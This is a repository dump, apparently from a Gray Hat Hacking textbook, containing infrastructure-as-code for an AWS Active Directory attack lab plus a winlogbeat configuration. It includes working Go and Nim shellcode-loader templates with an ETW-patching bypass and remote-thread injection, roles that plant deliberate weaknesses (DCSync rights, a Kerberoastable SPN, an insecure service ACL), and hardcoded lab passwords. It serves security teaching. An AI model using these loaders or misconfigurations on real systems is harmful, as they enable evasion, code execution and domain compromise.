================================================
module createFiber.go
go 1.15
require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum
================================================
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template
================================================
// Inspired by ired.team and Ne0nd0g's go-shellcode repository
// Reference: https://github.com/Ne0nd0g/go-shellcode
// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber
package main
// import modules we'll need. We will need unsafe and the windows libraries to be able to
// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go
// restrictions around casting so that we can execute code
import (
"encoding/base64"
"fmt"
"unsafe"
"golang.org/x/sys/windows"
)
// Constants that we will need
const (
_MEM_COMMIT = 0x1000
_MEM_RESERVE = 0x2000
_PAGE_RWX = 0x40
)
func main() {
// shellcode in base64
sc := "INJECT"
shellcode, err := base64.StdEncoding.DecodeString(sc)
if err != nil {
fmt.Sprintf("Base64 Decoding Error: %s", err.Error())
return
}
// Load dlls
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
ntdll := windows.NewLazySystemDLL("ntdll.dll")
// memory creation/copy routines
VirtualAlloc := kernel32.NewProc("VirtualAlloc")
RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
// Fiber creation routines
ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
CreateFiber := kernel32.NewProc("CreateFiber")
SwitchToFiber := kernel32.NewProc("SwitchToFiber")
// Only fibers can scedule fibers, so this convers the main thread into a fiber
_, _, err = ConvertThreadToFiber.Call()
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error())
return
}
// Create memory for our shellcode
addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)
if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) {
fmt.Sprintf("VirtualAlloc Failed:%s", err.Error())
return
}
// Copy shellcode to our newly created memory
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error())
return
}
// Create Fiber to execute shellcode
fiber, _, err:= CreateFiber.Call(0, addr, 0)
if err!= nil && err.Error() != "The operation completed successfully." {
fmt.Sprintf("CreateFiber Failed:%s", err.Error())
return
}
// Switch to Fiber
SwitchToFiber.Call(fiber)
}
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/nim.template
================================================
# Adapted from Byt3bl33der's ETW code.
import winim/lean
import strformat
import dynlib
import osproc
# 0xc3 = RET in assembly
const patch: array[1, byte] = [byte 0xc3]
proc Patchntdll(): bool =
var
ntdll: LibHandle
etwPointer: pointer
origProtect: DWORD
trash: DWORD
disabled: bool = false
ntdll = loadLib("ntdll")
if isNil(ntdll):
echo "[X] Failed to load ntdll.dll"
return disabled
etwPointer = ntdll.symAddr("EtwEventWrite")
if isNil(etwPointer):
echo "[X] Failed to get the address of 'EtwEventWrite'"
return disabled
if VirtualProtect(etwPointer, patch.len, PAGE_EXECUTE_READ_WRITE, addr origProtect):
echo "[*] Applying patch"
copyMem(etwPointer, unsafeAddr patch, patch.len)
VirtualProtect(etwPointer, patch.len, origProtect, addr trash)
disabled = true
return disabled
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
# startProcess creates a process using the osproc module
let tProcess = startProcess("notepad.exe")
#suspends the process. The defer means if any of the below fails
#then close the process out
tProcess.suspend()
defer: tProcess.close()
echo "[*] Target Process: ", tProcess.processID
#opens the process with all access, allowing us to inject threads
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)
echo "[*] pHandle: ", pHandle
# Create shellcode memory. Shellcode is RWX until we are done copying
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
# copy the shellcode into memory
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
var origProtect: DWORD
VirtualProtect(
rPtr,
cast[SIZE_T](shellcode.len),
PAGE_EXECUTE_READ,
addr origProtect
)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
INJECTHERE
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
var success = Patchntdll()
echo fmt"[*] ETW blocked by patch: {bool(success)}"
injectCreateRemoteThread(shellcode)
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/tasks/main.yml
================================================
---
- name: Make python3 default
alternatives:
name: python
path: /usr/bin/python3
link: /usr/bin/python
priority: 10
- name : disable apache2 startup
systemd:
enabled: no
name: apache2
state: stopped
- name : disable smbdstartup
systemd:
enabled: no
name: smbd
state: stopped
- name: checkout Offensive Nim
git:
repo: https://github.com/byt3bl33d3r/OffensiveNim.git
dest: /home/kali/OffensiveNim
- name: checkout https://github.com/Ne0nd0g/go-shellcode
git:
repo: https://github.com/Ne0nd0g/go-shellcode.git
dest: /home/kali/go-shellcode
- name: Download Microsoft Package Pieces
get_url:
url: https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb
dest: /tmp/packages-microsoft-prod.deb
- name: Install Microsoft package
apt:
deb: /tmp/packages-microsoft-prod.deb
- name: Fix repo list
shell: echo "" > /etc/apt/sources.list
- name: Install .Net 3.1 and Covenant
apt:
update_cache: yes
pkg:
- dotnet-sdk-3.1
- mingw-w64
- nim
- covenant-kbx
- golang
state: latest
retries: 5
delay: 10
- name: install evil-winrm gem
gem:
name: evil-winrm
user_install: no
version: 2.4
- name: Copy code
copy:
src: ../files/shells
dest: /home/kali
- name: Copy covenant patch
copy:
src: ../files/covenant.patch
dest: /tmp/covenant.patch
- name: Copy share helper
copy:
src: ../files/addshare.txt
dest: /home/kali/addshare.txt
- name: patch covenant
shell: cd / && patch -p1 < tmp/covenant.patch
- name: fix file ownership
file:
path: /home/kali
owner: kali
recurse: yes
================================================
FILE: ch07/Lab/ansible/roles/target_customizations/tasks/main.yml
================================================
---
- name: Update Local Security Policy to allow users to run scheduled tasks
win_user_right:
name: SeBatchLogonRight
users:
- GHH\target
action: add
- name: Add scheduled task for Kali access
win_scheduled_task:
name: ResponderPing
enabled: yes
hidden: no
actions:
- path: powershell.exe
arguments: -exec bypass -win hidden -nopro -command "Get-ChildItem //10.0.0.40/qq"
triggers:
- type: registration
repetition:
interval: PT1M
username: "GHH\\target"
password: "Winter2021!"
logon_type: password
update_password: yes
- name: Add scheduled task for inveigh
win_scheduled_task:
name: InveighPing
enabled: yes
hidden: no
actions:
- path: powershell.exe
arguments: -exec bypass -win hidden -nopro -command "Get-ChildItem //10.0.0.30/qq"
triggers:
- type: registration
repetition:
interval: PT1M
username: "GHH\\target"
password: "Winter2021!"
logon_type: password
update_password: yes
- name: Add target to Remote desktop users
win_group_membership:
name: "Remote Desktop users"
state: present
members:
- GHH\target
- name: Add target to Remote managmenters
win_group_membership:
name: "Remote Management Users"
state: present
members:
- GHH\target
- name: Create directory for vulnerable service
win_file:
path: "C:\\Software\\Vulnerable Software\\Updater"
state: directory
- name: Create vulnerable service by copying legitimate service bunary
win_copy:
remote_src: yes
src: "C:\\Windows\\System32\\snmptrap.exe"
dest: "C:\\Software\\Vulnerable Software\\Updater\\vulnagent.exe"
- name: Update folder ACLs
win_acl:
user: BUILTIN\Users
path: "C:\\Software\\Vulnerable Software\\"
rights: FullControl, Modify
type: allow
state: absent
- name: Update folder ACLs
win_acl:
user: Users
path: "C:\\Software\\Vulnerable Software\\"
rights: FullControl, Modify
type: allow
state: absent
- name: Create vulnerable service
win_service:
name: Vulnerable Software
description: Vulnerable Software Ltd
username: LocalSystem
path: "C:\\Software\\Vulnerable Software\\Updater\\vulnagent.exe"
- name: Allow target to restart service
win_shell: sc.exe sdset "vulnerable software" "D:(A;;RPWPLOCCLCDT;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
- name: Create task for inventory updates
win_scheduled_task:
name: UpdateInventory
description: Update inventory data
username: SYSTEM
hidden: no
enabled: yes
compatability: 4
actions:
- path: C:\Software\InventoryMgmt\update.exe
triggers:
- type: time
start_boundary: '2017-10-09T09:00:00'
repetition:
interval: PT5M
state: present
================================================
FILE: ch07/Lab/ansible/roles/windows_client_join_domain/tasks/main.yml
================================================
---
- name: Gather facts from new server
setup:
filter: ansible_default_ipv4.address
- name: setup DNS properly
win_dns_client:
ipv4_addresses: 10.0.0.10
- name: join domain
win_domain_membership:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
domain_admin_user: "{{ windows_domain_controller_info['domain_admin_user'] }}"
domain_admin_password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
hostname: ws20
state: domain
register: domain_state
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
shutdown_timeout_sec: 3600
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/defaults/main.yml
================================================
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/handlers/main.yml
================================================
- name: restart machine
win_reboot:
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/features.yml
================================================
---
- name: features | Installing Windows DNS Server
win_feature:
name: DNS
state: present
include_management_tools: yes
include_sub_features: yes
register: _windows_dns_server
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/main.yaml
================================================
- include: features.yml
- include: reboot.yml
================================================
FILE: ch07/Lab/ansible/roles/windows_dns_server/tasks/reboot.yml
================================================
---
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
when: >
_windows_dns_server['restart_needed'] is defined and
_windows_dns_server['restart_needed']
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/defaults/main.yml
================================================
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/handlers/main.yml
================================================
- name: restart machine
win_reboot:
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/create.yml
================================================
---
# tasks file for ansible-windows-domain-controller
#
- name: set local admin password
win_user:
name: Administrator
password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
state: present
- name: features | Installing RSAT AD Admin Center
win_feature:
name: RSAT-AD-AdminCenter
state: present
- name: features | Installing AD Domain Services
win_feature:
name: AD-Domain-Services
include_management_tools: yes
include_sub_features: yes
state: present
- name: Creating a windows domain
win_domain:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
safe_mode_password: "{{ windows_domain_controller_info['safe_mode_password'] }}"
- name: Setting DNS Servers
win_dns_client:
adapter_names: "*"
ipv4_addresses: "127.0.0.1"
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 300
shutdown_timeout: 300
- name: Managing Domain Controller Membership
win_domain_controller:
dns_domain_name: "{{ windows_domain_controller_info['dns_domain_name'] }}"
domain_admin_user: "{{ windows_domain_controller_info['domain_admin_user'] }}"
domain_admin_password: "{{ windows_domain_controller_info['domain_admin_password'] }}"
safe_mode_password: "{{ windows_domain_controller_info['safe_mode_password'] }}"
state: "{{ windows_domain_controller_info['state'] }}"
register: _windows_domain_controller
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/main.yaml
================================================
- include: create.yml
- include: reboot.yml
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_controller/tasks/reboot.yml
================================================
---
- name: reboot | Rebooting Server
win_reboot:
reboot_timeout_sec: 3600
shutdown_timeout_sec: 3600
when: >
_windows_domain_controller['reboot_required'] is defined and
_windows_domain_controller['reboot_required']
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_users_groups/files/usermods.ps1
================================================
Import-Module ActiveDirectory
#Bring up an Active Directory command prompt so we can use this later on in the script
#Get a reference to the RootDSE of the current domain
$rootdse = Get-ADRootDSE
#Get a reference to the current domain
$domain = Get-ADDomain
cd AD:\
#Create a hashtable to store the GUID value of each schema class and attribute
$guidmap = @{}
Get-ADObject -SearchBase ($rootdse.SchemaNamingContext) -LDAPFilter `
"(schemaidguid=*)" -Properties lDAPDisplayName,schemaIDGUID |
% {$guidmap[$_.lDAPDisplayName]=[System.GUID]$_.schemaIDGUID}
#Create a hashtable to store the GUID value of each extended right in the forest
$extendedrightsmap = @{}
Get-ADObject -SearchBase ($rootdse.ConfigurationNamingContext) -LDAPFilter `
"(&(objectclass=controlAccessRight)(rightsguid=*))" -Properties displayName,rightsGuid |
% {$extendedrightsmap[$_.displayName]=[System.GUID]$_.rightsGuid}
#Create a new OU called Administrative Groups and make a group in it
New-ADOrganizationalUnit -Name "Administrative Groups"
New-ADGroup "CloudSync Users" -Path "OU=Administrative Groups,DC=ghh,DC=local" -GroupScope Global -GroupCategory Security
#Git sid and acl of the root OU
$sid = New-Object System.Security.Principal.SecurityIdentifier(Get-ADGroup "CloudSync Users").SID
$acl = Get-ACL $domain.distinguishedname
#Add Replicate changes all to root DN for CloudSync Users group
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"ExtendedRight","Allow",'89e95b76-444d-4c62-991a-0facbeda640c',"None","00000000-0000-0000-0000-000000000000"))
Set-Acl -Path $domain.distinguishedname -AclObject $acl
#Get the ACL for Administrative Groups
$acl = Get-ACL "OU=Administrative Groups,DC=ghh,DC=local"
#Make a Password Admin user
new-ADuser PasswordAdmin -enabled $true -Description "Password Reset Admin" -AccountPassword (ConvertTo-SecureString "Passw+ord127" -AsPlaintext -Force )
#Set that user so that they can manage membership and passwords of groups in that OU
$sid = New-Object System.Security.Principal.SecurityIdentifier(Get-ADUser PasswordAdmin).SID
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"WriteProperty","Allow", "bf9679c0-0de6-11d0-a285-00aa003049e2","Descendents",$guidmap["group"]))
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule `
$sid,"WriteProperty","Allow", "00299570-246d-11d0-a768-00aa006e0529","Descendents",$guidmap["user"]))
Set-Acl -Path "OU=Administrative Groups,DC=ghh,DC=local" -AclObject $acl
New-ADComputer -Enabled $true -Name Password
setspn -s www/Password PasswordAdmin
Add-ADGroupMember -Identity "CloudSync Users" -members "PasswordAdmin"
================================================
FILE: ch07/Lab/ansible/roles/windows_domain_users_groups/tasks/main.yml
================================================
---
- name: Disable domain password complexity
win_shell: 'Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser | Set-ADDefaultDomainPasswordPolicy -ComplexityEnabled $false -MinPasswordAge 0 -MaxPasswordAge 0 -MinPasswordLength 3'
- name: Add Windows Users
win_domain_user:
name: "{{ item.name }}"
passsword: "{{ item.password }}"
groups : "{{ item.groups }}"
password_never_expires: true
state: present
enabled: no
account_disabled: no
with_items:
- "{{ domain_users }}"
- name: Set Password (workaround because not working)
win_shell: '$pw = "{{ item.password}}" | ConvertTo-SecureString -AsPlainText -Force; Set-ADAccountPassword -Identity {{ item.name }} -NewPassword $pw'
with_items:
- "{{ domain_users }}"
- name: Enable windows users
win_domain_user:
name: "{{ item.name }}"
state: present
enabled: yes
with_items:
- "{{ domain_users }}"
- name: chocolatey install 7zip
win_chocolatey:
name: 7zip
state: latest
- name: chocolatey install git
win_chocolatey:
name: git
state: latest
- name: create temp dir
win_file:
path: c:\temp
state: directory
================================================
FILE: ch07/Lab/ansible/roles/windows_local_group_membership/tasks/main.yml
================================================
---
- name: add users to local groups for remote login
win_group_membership:
name: "Remote Desktop Users"
state: present
members:
- GHH\target
================================================
FILE: ch07/Lab/ansible/vars/users.yml
================================================
---
#domain_users:
#- { name : "target", password : "Winter2021" , groups : "" }
#- { name : "ghhadmin" , password : "GrayHat6" , groups : "Domain Admins" }
domain_users:
- name : "target"
password : "Winter2021!"
groups : "Domain Users"
- name : "ghhadmin"
password : "GrayHat6!"
groups : "Domain Admins"
================================================
FILE: ch07/Lab/ansible/vars/vars.yml
================================================
windows_domain_controller_info:
dns_domain_name: ghh.local
domain_admin_password: GrayHatHack1ng!
domain_admin_user: Administrator@ghh.local
safe_mode_password: GrayHatHack1ng!
state: domain_controller
ip: 10.0.0.10
================================================
FILE: ch07/Lab/build.sh
================================================
#!/bin/bash
cd terraform
terraform init && terraform validate && terraform apply
cd ../ansible
ansible-playbook -i inventory ch07_playbook.yml
================================================
FILE: ch07/Lab/destroy.sh
================================================
#!/bin/bash
cd terraform
terraform destroy
================================================
FILE: ch07/Lab/terraform/aws_data.tf
================================================
data "aws_availability_zones" "this" {
state = "available"
}
data "aws_ami" "ghh-kali" {
most_recent = true
filter {
name = "name"
values = ["ghh-kali-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
data "aws_ami" "ghh-2019" {
most_recent = true
filter {
name = "name"
values = ["ghh-server2019-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
data "aws_ami" "ghh-2016" {
most_recent = true
filter {
name = "name"
values = ["ghh-server2016-*"]
}
filter {
name = "virtualization-type"
values = ["hvm"]
}
owners = ["self"]
}
================================================
FILE: ch07/Lab/terraform/aws_hosts.tf
================================================
locals {
dc-userdata = <<EOF
<powershell>
$admin = [adsi]("WinNT://./administrator, user")
$admin.psbase.invoke("SetPassword", "${var.dc_password}")
</powershell>
EOF
}
resource "aws_instance" "kali" {
ami = data.aws_ami.ghh-kali.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
vpc_security_group_ids = [aws_security_group.allow-ssh.id]
associate_public_ip_address = true
private_ip = "10.0.0.40"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-kali"
}
}
resource "aws_instance" "ghh_dc" {
ami = data.aws_ami.ghh-2019.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
private_ip = "10.0.0.10"
user_data_base64 = base64encode(local.dc-userdata)
vpc_security_group_ids = [aws_security_group.ghh_windows.id]
associate_public_ip_address = true
get_password_data = "true"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-dc"
}
}
resource "aws_instance" "ghh_target" {
ami = data.aws_ami.ghh-2016.id
instance_type = "t2.large"
key_name = var.key_name
subnet_id = aws_subnet.this.id
private_ip = "10.0.0.20"
user_data_base64 = base64encode(local.dc-userdata)
vpc_security_group_ids = [aws_security_group.ghh_windows.id]
associate_public_ip_address = true
get_password_data = "true"
root_block_device {
volume_size = 200
}
tags = {
Name = "ghh-target"
}
}
================================================
FILE: ch07/Lab/terraform/inventory.tmpl
================================================
${cat}:
hosts:
%{for addr in ip_addrs ~}
${addr}:
%{endfor ~}
vars:
%{for var in vars ~}
${var}
%{endfor ~}
================================================
FILE: ch07/Lab/terraform/main.tf
================================================
provider "aws" {
shared_credentials_file = var.shared_credentials_file
region = "us-east-1"
profile = "ghh"
}
================================================
FILE: ch07/Lab/terraform/outputs.tf
================================================
output "dc_password" { value = rsadecrypt(aws_instance.ghh_dc.password_data, file(var.key_path)) }
output "target_password" { value = rsadecrypt(aws_instance.ghh_target.password_data, file(var.key_path)) }
output "dc_ip" { value = try(aws_instance.ghh_dc.public_ip,null) }
output "target_ip" { value = try(aws_instance.ghh_target.public_ip,null) }
output "kali_ip" { value = try(aws_instance.kali.public_ip,null) }
resource "local_file" "dc_inv" {
content = templatefile("./inventory.tmpl",
{
cat = "dc",
ip_addrs = [aws_instance.ghh_dc.public_ip]
vars = ["ansible_connection: winrm",
"ansible_user: Administrator",
"ansible_winrm_scheme: http",
"ansible_winrm_transport: basic",
"ansible_winrm_server_cert_validation: ignore",
"ansible_winrm_port: 5985",
"ansible_password: ${var.dc_password}"
]
}
)
filename = "../ansible/inventory/dc.yml"
}
resource "local_file" "target_inv" {
content = templatefile("./inventory.tmpl",
{
cat = "target",
ip_addrs = [aws_instance.ghh_target.public_ip]
vars = ["ansible_connection: winrm",
"ansible_user: Administrator",
"ansible_winrm_scheme: http",
"ansible_winrm_transport: basic",
"ansible_winrm_server_cert_validation: ignore",
"ansible_winrm_port: 5985",
"ansible_password: ${var.dc_password}"
]
}
)
filename = "../ansible/inventory/target.yml"
}
resource "local_file" "kali_inv" {
content = templatefile("./inventory.tmpl",
{
cat = "kali",
ip_addrs = [aws_instance.kali.public_ip]
vars = [
"ansible_user: kali",
"ansible_python_interpreter: /usr/bin/python3"
]
}
)
filename = "../ansible/inventory/kali.yml"
}
================================================
FILE: ch07/Lab/terraform/terraform.tfvars-orig
================================================
key_path="<path to your SSH KEY>"
================================================
FILE: ch07/Lab/terraform/variables.tf
================================================
variable "aws_region" {
default = "us-east-1"
}
variable "aws_profile" {
default = "ghh"
}
variable "dc_password" {
default = "GrayHatHack1ng!"
}
variable "shared_credentials_file" {
description = "Path to your AWS credentials file"
type = string
default = "/home/username/.aws/credentials"
}
variable "key_path" {
description = "Key path for SSHing into EC2"
default = "~/.ssh/id_rsa.pem"
}
variable "key_name" {
description = "Key name for SSHing into EC2"
default = "ghh"
}
variable "ip_allowlist" {
description = "A list of CIDRs that will be allowed to access the EC2 instances"
type = list(string)
default = ["0.0.0.0/0"]
}
================================================
FILE: ch07/Lab/terraform/versions.tf
================================================
================================================
FILE: ch07/Lab/terraform/vpc.tf
================================================
resource "aws_vpc" "this" {
cidr_block = "10.0.0.0/16"
enable_dns_hostnames = true
enable_dns_support = true
lifecycle {
create_before_destroy = true
}
}
resource "aws_internet_gateway" "this" {
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_eip" "nat" {
vpc = true
}
resource "aws_nat_gateway" "nat" {
allocation_id = aws_eip.nat.id
subnet_id = aws_subnet.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_subnet" "this" {
cidr_block = "10.0.0.0/16"
map_public_ip_on_launch = true
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route_table" "this" {
vpc_id = aws_vpc.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route" "this" {
route_table_id = aws_route_table.this.id
destination_cidr_block = "0.0.0.0/0"
gateway_id = aws_internet_gateway.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_route_table_association" "this" {
route_table_id = aws_route_table.this.id
subnet_id = aws_subnet.this.id
lifecycle {
create_before_destroy = true
}
}
resource "aws_security_group" "allow-ssh" {
vpc_id = aws_vpc.this.id
name = "allow-ssh"
description = "security group that allows ssh and all egress traffic"
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/16"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["224.0.0.0/24"]
}
ingress {
from_port = 22
to_port = 22
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 8675
to_port = 8675
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 7443
to_port = 7443
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
tags = {
Name = "allow-ssh"
}
}
resource "aws_security_group" "ghh_windows" {
vpc_id = aws_vpc.this.id
name = "ghh_windows"
description = "security group that allows windows ports"
egress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["0.0.0.0/0"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["10.0.0.0/16"]
}
ingress {
from_port = 0
to_port = 0
protocol = "-1"
cidr_blocks = ["224.0.0.0/24"]
}
ingress {
from_port = 3389
to_port = 3389
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
ingress {
from_port = 5985
to_port = 5986
protocol = "tcp"
cidr_blocks = var.ip_allowlist
}
tags = {
Name = "ghh-rules"
}
}
================================================
FILE: ch07/README.md
================================================
# Gray Hat Hacking v6 Chapter 07
This directory contains all the components necessary for Chapter 07.
## Lab Information
The following VMs will be setup for this lab:
- Domain Controller
- IP: 10.0.0.10
- Domain Admin: ghhadmin
- DA Password: GrayHat6!
- Target Computer
- IP: 10.0.0.20
- Target User: target
- Target Password: Winter2021!
- Kali Computer
- IP: 10.0.0.40
- User: kali
- Pass: SSH key setup with the lab
## Setting up the Lab
1. Make sure you have completed all the steps at (https://github.com/GrayHatHacking/GHHv6/tree/main/CloudSetup).
1. Go into the Lab/terraform directory and copy the `terraform.tfvars-orig` to `terraform.tfvars`. Edit the file with your
favorite editor and then replace the contents of the key_path variable with the path to your SSH key. An example
might look like:
`key_path="/home/kali/.ssh/id_rsa`
1. Go into the Lab subdirectory and run `build.sh` to start the environment build. It will ask you are sure you want to create resources.
when it does, type in `yes`.
1. This will create resources that may cost you money. If you want to destroy the lab between uses,
run `destroy.sh`. Answer `yes` when it asks if you are sure, and the resources will be deleted.
## Retrieving the IP addresses of the machines
Once the build.sh script is completed, it should print the IP addresses of the hosts
out to the screen. If you forget these IP addresses, you can go into the terraform directory
in the lab and type in "terraform show" and it will show you the status of your
lab as well as show you the IP addresses of the relevant boxes
## What does each machine do?
### Domain Controller
This system is the domain controller for our lab. The target VM is a member of
a domain in order to make the scenario more realistic. This system is critical so it
should not be shut down
### Target system
This is the system you will be attacking during the lab. It should be the only system besides
the Kali box that you would need to interact with in the lab environment unless you
do additional work on your own.
### Kali box
This is the Kali attack system that will be used in the lab.
## Notes
By default this lab allows ANYONE who knows the credentials to connect to it. For new users
it may be confusing to figure out where they are connecting from. If you would like to make this more
secure, you can limit the lab to your IP only by adding a line into the `terraform.tfvars` file that contains
allow list information like this:
`ip_allowlist = ["1.2.3.4/32","4.5.6.7/24"]`
================================================
FILE: ch08/winlogbeat.yml
================================================
# Example for the Beats on WEF server of DetectionLab
# Configuration version: 2021-05-31
# Derived from https://github.com/cyberdefenders/DetectionLabELK/blob/d3e22053f737883b0c8c42224967e976bb988863/Vagrant/scripts/install-winlogbeat.ps1
processors:
- script:
when.equals.winlog.channel: Security
lang: javascript
id: security
file: ${path.home}/module/security/config/winlogbeat-security.js
winlogbeat.event_logs:
- name: ForwardedEvents
ignore_older: 15m
- name: WEC-Authentication
- name: WEC-Code-Integrity
- name: WEC-EMET
- name: WEC-Powershell
- name: WEC-Process-Execution
- name: WEC-Services
- name: WEC-WMI
- name: WEC16-Test
- name: WEC2-Application-Crashes
- name: WEC2-Applocker
- name: WEC2-Group-Policy-Errors
- name: WEC2-Object-Manipulation
- name: WEC2-Registry
- name: WEC2-Task-Scheduler
- name: WEC2-Windows-Defender
- name: WEC3-Account-Management
- name: WEC3-Drivers
- name: WEC3-External-Devices
- name: WEC3-Firewall
- name: WEC3-Print
- name: WEC3-Smart-Card
- name: WEC3-Windows-Diagnostics
- name: WEC4-Bits-Client
- name: WEC4-DNS
- name: WEC4-Hotpatching-Errors
- name: WEC4-Shares
- name: WEC4-System-Time-Change
- name: WEC4-Windows-Updates
- name: WEC4-Wireless
- name: WEC5-Autoruns
- name: WEC5-Certificate-Authority
- name: WEC5-Crypto-API
- name: WEC5-Log-Deletion-Security
- name: WEC5-Log-Deletion-System
- name: WEC5-MSI-Packages
- name: WEC5-Operating-System
- name: WEC6-ADFS
- name: WEC6-Device-Guard
- name: WEC6-Duo-Security
- name: WEC6-Exploit-Guard
- name: WEC6-Microsoft-Office
- name: WEC6-Software-Restriction-Policies
- name: WEC6-Sysmon
processors:
- script:
lang: javascript
id: sysmon
file: ${path.home}/module/sysmon/config/winlogbeat-sysmon.js
- name: WEC7-Active-Directory
- name: WEC7-Privilege-Use
- name: WEC7-Terminal-Services
- name: Windows PowerShell
event_id: 400, 403, 600, 800
processors:
- script:
lang: javascript
id: powershell
file: ${path.home}/module/powershell/config/winlogbeat-powershell.js
- name: Microsoft-Windows-PowerShell/Operational
event_id: 4103, 4104, 4105, 4106
processors:
- script:
lang: javascript
id: powershell-operational
file: ${path.home}/module/powershell/config/winlogbeat-powershell.js
#setup.kibana:
# host: "192.168.38.105:5601"
# username: vagrant
# password: vagrant
#setup.dashboards.enabled: true
#setup.ilm.enabled: false
#output.elasticsearch:
# hosts: ["192.168.38.105:9200"]
#----------------------------- Kafka output --------------------------------
output.kafka:
# initial brokers for reading cluster metadata
# Place your HELK IP(s) here (keep the port).
